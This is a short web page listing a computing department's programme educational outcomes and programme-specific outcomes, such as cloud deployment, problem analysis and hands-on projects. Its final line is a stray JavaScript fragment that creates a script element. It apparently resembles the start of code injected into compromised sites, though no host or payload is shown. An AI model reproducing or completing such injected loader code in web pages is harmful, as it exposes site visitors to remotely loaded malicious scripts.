Programme Educational Outcomes(PeO)
- To make student appreciate the necessity of data, communication and computation infrastructure for society and business.
- To encourage student to have hand on experience with the classical problems and their solution design methodologies using upcoming technologies.
- Encourage student to use simulation and modeling tools to validate their algorithms and work for continuous improvement.
- Enable a student to work independently as well as a team member to deliver within constraint limits as a professional.
- Develop the department and student to expectation of society and industry.
Programme Specific Outcomes(PsO)
- To make aware of the history of computing and communication infrastructure.
- Introduce students with problem analysis and formulation techniques
- Hands on experience with main stream off the syllabus programming languages.
- Conceptualizing with the modern paradigm of software deployment especially Clouds
- Introduction to the automated learning techniques in business decision making.
- To encourage students to take up near to real life projects a self assessment exercise
var d=document;var s=d.createElement(‘script’);